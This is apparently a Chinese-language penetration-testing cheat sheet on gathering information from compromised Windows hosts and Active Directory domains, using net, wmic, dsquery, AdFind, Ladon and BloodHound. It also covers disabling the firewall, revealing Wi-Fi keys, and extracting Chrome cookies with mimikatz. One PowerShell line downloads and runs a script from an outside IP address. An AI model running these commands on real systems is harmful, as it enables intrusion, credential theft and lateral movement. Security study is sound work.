常规信息类收集,应用、服务、权限等
用户信息收集
查看本机用户列表
net user
获取本地管理员信息
net localgroup administrators
查看当前在线用户
quser
quser user
query user || qwinsta
查看当前用户在目标系统中的具体权限
whoami /all
查看当前权限
whoami && whoami /priv
查看当前机器中所有的组名,了解不同组的职能,如, IT,HR,ADMIN,FILE
net localgroup
系统信息收集
查询网络配置信息。进行 IP 地址段信息收集
ipconfig /all
查询操作系统及软件信息
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" # 英文系统
systeminfo | findstr /B /C:"OS 名称 " /C:"OS 版本 " # 中文系统
查看当前系统版本
wmic OS get Caption,CSDVersion,OSArchitecture,Version
查看系统体系结构
echo %PROCESSOR_ARCHITECTURE%
查询本机服务信息
wmic service list brief
查看安装的软件的版本、路径等
wmic product get name, version
powershell "Get-WmiObject -class Win32_Product |Select-Object -Property name, version"
查询进程信息
tasklist
wmic process list brief
查看启动程序信息
wmic startup get command,caption # 查看计划任务
at ( win10 之前)
schtasks /query /fo LIST /v ( win10 )
列出或断开本地计算机与所连接的客户端的对话
net session
查看远程连接信息
cmdkey /l
查看补丁列表
systeminfo | findstr KB
查看补丁的名称、描述、 ID 、安装时间等
wmic qfe get Caption,Description,HotFixID,InstalledOn
查看杀软
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
/Format:List
查看本地密码策略
net accounts
查看 hosts 文件:
Linux : cat /etc/hosts
Windows : type c:\Windows\system32\drivers\etc\hosts
命令太多可通过windows的批处理脚本,bat文件和vbs文件
wmic_info整合收集:
https://codeload.github.com/Alex-null/wmic_info_gather/
上传至目标执行即可生成out.html文件在下载到本地即可
防火墙信息收集
关闭防火墙 (Windows Server 2003 以前的版本 )
netsh firewall set opmode disable
关闭防火墙 (Windows Server 2003 以后的版本 )
netsh advfirewall set allprofiles state off
查看防火墙配置 (netsh 命令也可以用作端口转发 )
netsh firewall show config
查看配置规则
netsh advfirewall firewall show rule name=all
#wifi 密码
netsh wlan show profile
netsh wlan show profile name="EEFUNG" key=clear
其他信息收集
回收站内容获取
FOR /f "skip=1 tokens=1,2 delims= " %c in ('wmic useraccount get name^,sid') do dir /a /b C:\Recycle.Bin\\%d\\ \^\>%c.txt
cd C:\\Recycle.Bin\S-1-5-21-3845785564-1101086751-683477353-1001\
I 开头的文件保存的是路径信息
R 开头的文件保存的是文件内容
#Chrome 历史记录和 Cookie 获取
%localappdata%\google\chrome\USERDA~1\default\LOGIND~1
%localappdata%\google\chrome\USERDA~1\default\cookies
chrome 的用户信息,保存在本地文件为 sqlite 数据库格式
mimikatz.exe privilege::debug log "dpapi::chrome
/in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
ProxyServer
通过 pac 文件自动代理情况
REG QUERY "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v
AutoConfigURL
REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v
PortNumber # 获取远程端口
自动信息收集
powershell 脚本
FTP 访问、共享连接、 putty 连接、驱动、应用程序、 hosts 文件、进程、无线网络记录
powershell iex(new-object net.webclient).downloadstring('http://47.115.9.13:8000/Get
Information.ps1');Get-Information
Nishang-Gather-Get-Information.ps1
https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1
msf自动信息收集
#scraper
Meterpreter > run scraper
/root/.msf4/logs/scripts/scraper
#winenum
Meterpreter > run winenum
/root/.msf4/logs/scripts/winenum
架构信息类收集-网络、用户、域控等
网络信息收集
查看本机所有的 tcp,udp 端口连接及其对应的 pid
netstat -ano
查看本机所有的 tcp,udp 端口连接 ,pid 及其对应的发起程序
netstat -anob
查看本机共享列表和可访问的域共享列表 ( 445 端口)
net share
wmic share get name,path,status
查看路由表和 arp 缓存
route print
arp -a
ipconfig /all 通过查询网络信息判断是否在域内
nslookup + dns 后缀
whoami /all 用户权限 , 获取 SID
net config workstation 登录信息
net user 本地用户
net localgroup 本地用户组
net user /domain 或 wmic useraccount get /all 获取域用户信息
net group /domain 获取域用户组信息( Enterprise Admins 组权限最大)
wmic useraccount get /all 涉及域用户详细信息
net group "Domain Admins" /domain 查询域管理员账户
net group "Enterprise Admins" /domain 查询域系统管理员用户组
net group "Domain Controllers" /domain 查询域控制器
net view /domain: 域名 查询域内所有计算机
net group "domain computers" /domain 查询所有域成员列表
net accounts /domain 查看域管理策略
net localgroup administrators /domain 登录本机的域管理员
nslookup -q=ns de1ay.com 查看域内 DNS 服务器定位域控
权限说明
Domain Admins : 域管理员组
Domain Computers : 域内机器
Domain Controllers :域控制器
Domain Guest : 域访客,权限较低
Domain User : 域用户
Enterprise Admins : 企业系统管理员用户
dsquery信息收集
dsquery工具一般在域控上才有,不过你可以上传一个dsquery
dsquery computer 查看当前域内的所有机器
dsquery user 查看当前域中的所有账户名
dsquery group 查看当前域内的所有组名
dsquery site 查看域内所有的 web 站点
dsquery server 查看当前域中的服务器 ( 一般结果只有域控的主机名 )
dsquery user domainroot -name admin* -limit 240 查询前 240 个以 admin 开头的用户名
nltest /domain_trusts 查询域内信任关系
nltest /DCLIST:xs 查看域控制器的机器名
探测域内存活主机
Netbios协议探测
Netbios简介:
IBM公司开发,主要用于数十台计算机的小型局域网。该协议是一种在局域网上的程序可以使用的应用
程序编程接口(API),为程序提供了请求低级服务的同一的命令集,作用是为了给局域网提供网络以及
其他特殊功能。系统可以利用WINS服务、广播及Lmhost文件等多种模式将NetBIOS名-------特指基于
NETBIOS协议获得计算机名称------解析为相应IP地址,实现信息通讯,所以在局域网内部使用NetBIOS
协议可以方便地实现消息通信及资源的共享
Nbtscan
项目地址: http://www.unixwiz.net/tools/nbtscan.html
使用nbtscan扫描本地或远程TCP/IP网络上开放的NetBIOS名称服务器
输出的结果第一列为IP地址,第二列为机器名和所在域的名称,第三列即最后一列为及其所开启的服务
的列表
Windows : nbtscan.exe --m 10.10.10.0/24 nbtstat --n
Linux : nbtscan -r 10.10.10.0/24
工具信息收集LadanGO、Adfind
工具使用Ladongo
https://github.com/k8gege/Ladon
001 多协议探测存活主机 ( IP 、机器名、 MAC 地址、制造商)
Ladon 192.168.1.8/24 OnlinePC
002 多协议识别操作系统 ( IP 、机器名、操作系统版本、开放服务)
Ladon 192.168.1.8/24 OsScan
003 扫描存活主机
Ladon 192.168.1.8/24 OnlineIP
004 ICMP 扫描存活主机
Ladon 192.168.1.8/24 Ping
005 扫描 SMB 漏洞 MS17010 ( IP 、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 MS17010
006 SMBGhost 漏洞检测 CVE-2020-0796 ( IP 、机器名、漏洞编号、操作系统版本)
Ladon 192.168.1.8/24 SMBGhost
下载地址
https://github.com/k8gege/LadonGo
工具使用之Adfind
列出域控制器名称:
AdFind -sc dclist
查询当前域中在线的计算机:
AdFind -sc computers_active
查询当前域中在线的计算机 ( 只显示名称和操作系统 ) :
AdFind -sc computers_active name operatingSystem
查询当前域中所有计算机:
AdFind -f "objectcategory=computer"
查询当前域中所有计算机 ( 只显示名称和操作系统 ) :
AdFind -f "objectcategory=computer" name operatingSystem
查询域内所有用户:
AdFind -users name
查询所有 GPO :
AdFind -sc gpodmp
下载地址
http://www.joeware.net/freetools/tools/adfind/index.htm
BloodHound域分析使用
安装 & 使用: http://cn-sec.com/archives/146548.html
1 、启动 neo4j neo4j.bat console
2 、启动 BloodHound BloodHound.exe
3 、运行程序后将生成数据导入,筛选查看